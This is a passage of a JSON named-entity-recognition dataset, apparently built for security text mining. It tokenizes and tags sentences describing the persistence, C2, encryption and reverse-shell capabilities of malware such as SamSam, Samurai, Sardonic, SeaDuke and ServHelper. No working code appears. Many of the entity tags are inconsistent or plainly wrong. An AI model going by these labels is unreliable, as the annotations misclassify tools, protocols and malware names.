"for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Sakula", + "calls", + "cmd.exe", + "to", + "run", + "various", + "DLL", + "files", + "via", + "rundll32", + "and", + "also", + "to", + "perform", + "file", + "cleanup.", + "Sakula", + "also", + "has", + "the", + "capability", + "to", + "invoke", + "a", + "reverse", + "shell." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Some", + "Sakula", + "samples", + "install", + "themselves", + "as", + "services", + "for", + "persistence", + "by", + "calling", + "WinExec", + "with", + "the", + "<code>net", + "start</code>", + "argument." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SamSam", + "has", + "used", + "garbage", + "code", + "to", + "pad", + "some", + "of", + "its", + "malware", + "components." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SamSam", + "encrypts", + "victim", + "files", + "using", + "RSA-2048", + "encryption", + "and", + "demands", + "a", + "ransom", + "be", + "paid", + "in", + "Bitcoin", + "to", + "decrypt", + "those", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SamSam", + "has", + "been", + "seen", + "using", + "AES", + "or", + "DES", + "to", + "encrypt", + "payloads", + "and", + "payload", + "components." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "B-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SamSam", + "has", + "been", + "seen", + "deleting", + "its", + "own", + "files", + "and", + "payloads", + "to", + "make", + "analysis", + "of", + "the", + "attack", + "more", + "difficult." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-OffAct", + "O", + "O" + ] + }, + { + "tokens": [ + "SamSam", + "uses", + "custom", + "batch", + "scripts", + "to", + "execute", + "some", + "of", + "its", + "components." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Samurai", + "can", + "compile", + "and", + "execute", + "downloaded", + "modules", + "at", + "runtime." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Samurai", + "can", + "leverage", + "an", + "exfiltration", + "module", + "to", + "download", + "arbitrary", + "files", + "from", + "compromised", + "machines." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Samurai", + "can", + "encrypt", + "API", + "name", + "strings", + "with", + "an", + "XOR-based", + "algorithm." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Samurai", + "can", + "use", + "a", + "specific", + "module", + "for", + "file", + "enumeration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Samurai", + "has", + "been", + "used", + "to", + "deploy", + "other", + "malware", + "including", + "Ninja." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "Samurai", + "has", + "created", + "the", + "directory", + "`%COMMONPROGRAMFILES%\\Microsoft", + "Shared\\wmi\\`", + "to", + "contain", + "DLLs", + "for", + "loading", + "successive", + "stages." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Samurai", + "loader", + "component", + "can", + "create", + "multiple", + "Registry", + "keys", + "to", + "force", + "the", + "svchost.exe", + "process", + "to", + "load", + "the", + "final", + "backdoor." + ], + "ner_tags": [ + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Samurai", + "has", + "the", + "ability", + "to", + "call", + "Windows", + "APIs." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Samurai", + "can", + "use", + "a", + "proxy", + "module", + "to", + "forward", + "TCP", + "packets", + "to", + "external", + "hosts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Samurai", + "can", + "encrypt", + "the", + "names", + "of", + "requested", + "APIs", + "and", + "deliver", + "its", + "final", + "payload", + "as", + "a", + "compressed,", + "encrypted", + "and", + "base64", + "encoded", + "blob." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Samurai", + "has", + "the", + "ability", + "to", + "proxy", + "connections", + "to", + "specified", + "remote", + "IPs", + "and", + "ports", + "through", + "a", + "a", + "proxy", + "module." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Samurai", + "can", + "query", + "`SOFTWARE\\Microsoft\\.NETFramework\\policy\\v2.0`", + "for", + "discovery." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Samurai", + "can", + "check", + "for", + "the", + "presence", + "and", + "version", + "of", + "the", + ".NET", + "framework." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Samurai", + "can", + "base64", + "encode", + "data", + "sent", + "in", + "C2", + "communications", + "prior", + "to", + "its", + "encryption." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Samurai", + "can", + "encrypt", + "C2", + "communications", + "with", + "AES." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Samurai", + "can", + "use", + "a", + ".NET", + "HTTPListener", + "class", + "to", + "receive", + "and", + "handle", + "HTTP", + "POST", + "requests." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Samurai", + "can", + "use", + "a", + "remote", + "command", + "module", + "for", + "execution", + "via", + "the", + "Windows", + "command", + "line." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Samurai", + "can", + "create", + "a", + "service", + "at", + "`HKLM\\SOFTWARE\\Microsoft\\Windows", + "NT\\CurrentVersion\\SvcHost`", + "to", + "trigger", + "execution", + "and", + "maintain", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sardonic", + "has", + "the", + "ability", + "to", + "send", + "a", + "random", + "64-byte", + "RC4", + "key", + "to", + "communicate", + "with", + "actor-controlled", + "C2", + "servers", + "by", + "using", + "an", + "RSA", + "public", + "key." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Sardonic", + "can", + "use", + "the", + "`QueueUserAPC`", + "API", + "to", + "execute", + "shellcode", + "on", + "a", + "compromised", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sardonic", + "PowerShell", + "scripts", + "can", + "be", + "encrypted", + "with", + "RC4", + "and", + "compressed", + "using", + "Gzip." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Sardonic", + "has", + "the", + "ability", + "to", + "collect", + "data", + "from", + "a", + "compromised", + "machine", + "to", + "deliver", + "to", + "the", + "attacker." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Sardonic", + "can", + "first", + "decrypt", + "with", + "the", + "RC4", + "algorithm", + "using", + "a", + "hardcoded", + "decryption", + "key", + "before", + "decompressing." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sardonic", + "has", + "the", + "ability", + "to", + "delete", + "created", + "WMI", + "objects", + "to", + "evade", + "detections." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sardonic", + "has", + "the", + "ability", + "to", + "upload", + "additional", + "malicious", + "files", + "to", + "a", + "compromised", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "B-Way", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sardonic", + "has", + "the", + "ability", + "to", + "call", + "Win32", + "API", + "functions", + "to", + "determine", + "if", + "`powershell.exe`", + "is", + "running." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "Sardonic", + "has", + "the", + "ability", + "to", + "execute", + "the", + "`net", + "view`", + "command." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sardonic", + "can", + "communicate", + "with", + "actor-controlled", + "C2", + "servers", + "by", + "using", + "a", + "custom", + "little-endian", + "binary", + "protocol." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "B-HackOrg", + "B-Tool", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Sardonic", + "has", + "the", + "ability", + "to", + "connect", + "with", + "actor-controlled", + "C2", + "servers", + "using", + "a", + "custom", + "binary", + "protocol", + "over", + "port", + "443." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "B-HackOrg", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sardonic", + "can", + "use", + "certain", + "ConfuserEx", + "features", + "for", + "obfuscation", + "and", + "can", + "be", + "encoded", + "in", + "a", + "base64", + "string." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sardonic", + "has", + "the", + "ability", + "to", + "execute", + "PowerShell", + "commands", + "on", + "a", + "compromised", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sardonic", + "has", + "the", + "ability", + "to", + "execute", + "the", + "`tasklist`", + "command." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sardonic", + "has", + "a", + "plugin", + "system", + "that", + "can", + "load", + "specially", + "made", + "DLLs", + "into", + "memory", + "and", + "execute", + "their", + "functions." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sardonic", + "can", + "encode", + "client", + "ID", + "data", + "in", + "32", + "uppercase", + "hex", + "characters", + "and", + "transfer", + "to", + "the", + "actor-controlled", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sardonic", + "has", + "the", + "ability", + "to", + "use", + "an", + "RC4", + "key", + "to", + "encrypt", + "communications", + "to", + "and", + "from", + "actor-controlled", + "C2", + "servers." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "B-Idus", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Sardonic", + "has", + "the", + "ability", + "to", + "collect", + "the", + "computer", + "name,", + "CPU", + "manufacturer", + "name,", + "and", + "C:\\", + "drive", + "serial", + "number", + "from", + "a", + "compromised", + "machine.", + "Sardonic", + "also", + "has", + "the", + "ability", + "to", + "execute", + "the", + "`ver`", + "and", + "`systeminfo`", + "commands." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sardonic", + "has", + "the", + "ability", + "to", + "execute", + "the", + "`ipconfig`", + "command." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sardonic", + "has", + "the", + "ability", + "to", + "execute", + "the", + "`netstat`", + "command." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sardonic", + "has", + "the", + "ability", + "to", + "execute", + "the", + "`net", + "start`", + "command." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sardonic", + "has", + "the", + "ability", + "to", + "run", + "`cmd.exe`", + "or", + "other", + "interactive", + "processes", + "on", + "a", + "compromised", + "computer." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sardonic", + "can", + "use", + "WMI", + "to", + "execute", + "PowerShell", + "commands", + "on", + "a", + "compromised", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sardonic", + "can", + "use", + "a", + "WMI", + "event", + "filter", + "to", + "invoke", + "a", + "command-line", + "event", + "consumer", + "to", + "gain", + "persistence." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SeaDuke", + "compressed", + "data", + "with", + "zlib", + "prior", + "to", + "sending", + "it", + "over", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SeaDuke", + "can", + "securely", + "delete", + "files,", + "including", + "deleting", + "itself", + "from", + "the", + "victim." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Features", + "O", + "O", + "B-Features", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SeaDuke", + "is", + "capable", + "of", + "uploading", + "and", + "downloading", + "files." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "Some", + "SeaDuke", + "samples", + "have", + "a", + "module", + "to", + "use", + "pass", + "the", + "ticket", + "with", + "Kerberos", + "for", + "authentication." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SeaDuke", + "uses", + "a", + "module", + "to", + "execute", + "Mimikatz", + "with", + "PowerShell", + "to", + "perform", + "Pass", + "the", + "Ticket." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SeaDuke", + "is", + "capable", + "of", + "persisting", + "via", + "the", + "Registry", + "Run", + "key", + "or", + "a", + ".lnk", + "file", + "stored", + "in", + "the", + "Startup", + "directory." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Some", + "SeaDuke", + "samples", + "have", + "a", + "module", + "to", + "extract", + "email", + "from", + "Microsoft", + "Exchange", + "servers", + "using", + "compromised", + "credentials." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "SeaDuke", + "is", + "capable", + "of", + "persisting", + "via", + "a", + ".lnk", + "file", + "stored", + "in", + "the", + "Startup", + "directory." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SeaDuke", + "has", + "been", + "packed", + "with", + "the", + "UPX", + "packer." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-HackOrg" + ] + }, + { + "tokens": [ + "SeaDuke", + "C2", + "traffic", + "is", + "base64-encoded." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SeaDuke", + "C2", + "traffic", + "has", + "been", + "encrypted", + "with", + "RC4", + "and", + "AES." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Some", + "SeaDuke", + "samples", + "have", + "a", + "module", + "to", + "extract", + "email", + "from", + "Microsoft", + "Exchange", + "servers", + "using", + "compromised", + "credentials." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "SeaDuke", + "uses", + "HTTP", + "and", + "HTTPS", + "for", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "SeaDuke", + "is", + "capable", + "of", + "executing", + "commands." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "SeaDuke", + "uses", + "an", + "event", + "filter", + "in", + "WMI", + "code", + "to", + "execute", + "a", + "previously", + "dropped", + "executable", + "shortly", + "after", + "system", + "startup." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Seasalt", + "obfuscates", + "configuration", + "data." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Seasalt", + "has", + "a", + "command", + "to", + "delete", + "a", + "specified", + "file." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Seasalt", + "has", + "the", + "capability", + "to", + "identify", + "the", + "drive", + "type", + "on", + "a", + "victim." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Seasalt", + "has", + "a", + "command", + "to", + "download", + "additional", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Seasalt", + "has", + "masqueraded", + "as", + "a", + "service", + "called", + "\"SaSaut\"", + "with", + "a", + "display", + "name", + "of", + "\"System", + "Authorization", + "Service\"", + "in", + "an", + "apparent", + "attempt", + "to", + "masquerade", + "as", + "a", + "legitimate", + "service." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Seasalt", + "has", + "a", + "command", + "to", + "perform", + "a", + "process", + "listing." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Seasalt", + "creates", + "a", + "Registry", + "entry", + "to", + "ensure", + "infection", + "after", + "reboot", + "under", + "<code>HKLM\\Software\\Microsoft\\Windows\\currentVersion\\Run</code>." + ], + "ner_tags": [ + "B-Idus", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Seasalt", + "uses", + "HTTP", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Seasalt", + "uses", + "cmd.exe", + "to", + "create", + "a", + "reverse", + "shell", + "on", + "the", + "infected", + "endpoint." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Seasalt", + "is", + "capable", + "of", + "installing", + "itself", + "as", + "a", + "service." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ServHelper", + "has", + "added", + "a", + "user", + "named", + "\"supportaccount\"", + "to", + "the", + "Remote", + "Desktop", + "Users", + "and", + "Administrators", + "groups." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "B-Purp", + "B-Org", + "O", + "B-Org", + "O" + ] + }, + { + "tokens": [ + "ServHelper", + "may", + "set", + "up", + "a", + "reverse", + "SSH", + "tunnel", + "to", + "give", + "the", + "attacker", + "access", + "to", + "services", + "running", + "on", + "the", + "victim,", + "such", + "as", + "RDP." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "ServHelper", + "has", + "a", + "module", + "to", + "delete", + "itself", + "from", + "the", + "infected", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ServHelper", + "may", + "download", + "additional", + "files", + "to", + "execute." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "ServHelper", + "has", + "created", + "a", + "new", + "user", + "named", + "\"supportaccount\"." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "ServHelper", + "has", + "the", + "ability", + "to", + "execute", + "a", + "PowerShell", + "script", + "to", + "get", + "information", + "from", + "the", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ServHelper", + "may", + "attempt", + "to", + "establish", + "persistence", + "via", + "the", + "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\</code>", + "run", + "key." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "ServHelper", + "has", + "commands", + "for", + "adding", + "a", + "remote", + "desktop", + "user", + "and", + "sending", + "RDP", + "traffic", + "to", + "the", + "attacker", + "through", + "a", + "reverse", + "SSH", + "tunnel." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ServHelper", + "contains", + "a", + "module", + "for", + "downloading", + "and", + "executing", + "DLLs", + "that", + "leverages", + "<code>rundll32.exe</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "B-Features", + "B-SamFile" + ] + }, + { + "tokens": [ + "ServHelper", + "contains", + "modules", + "that", + "will", + "use", + "schtasks", + "to", + "carry", + "out", + "malicious", + "operations." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ServHelper", + "will", + "attempt", + "to", + "enumerate", + "Windows", + "version", + "and", + "system", + "architecture." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ServHelper", + "will", + "attempt", + "to", + "enumerate", + "the", + "username", + "of", + "the", + "victim." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ServHelper", + "uses", + "HTTP", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "ServHelper", + "can", + "execute", + "shell", + "commands", + "against", + "cmd." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Seth-Locker", + "can", + "encrypt", + "files", + "on", + "a", + "targeted", + "system,", + "appending", + "them", + "with", + "the", + "suffix", + ".seth." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "Seth-Locker", + "has", + "the", + "ability", + "to", + "download", + "and", + "execute", + "files", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Seth-Locker", + "can", + "execute", + "commands", + "via", + "the", + "command", + "line", + "shell." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ShadowPad", + "has", + "used", + "DNS", + "tunneling", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ShadowPad", + "has", + "decrypted", + "a", + "binary", + "blob", + "to", + "start", + "execution." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ShadowPad", + "uses", + "a", + "DGA", + "that", + "is", + "based", + "on", + "the", + "day", + "of", + "the", + "month", + "for", + "C2", + "servers." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ 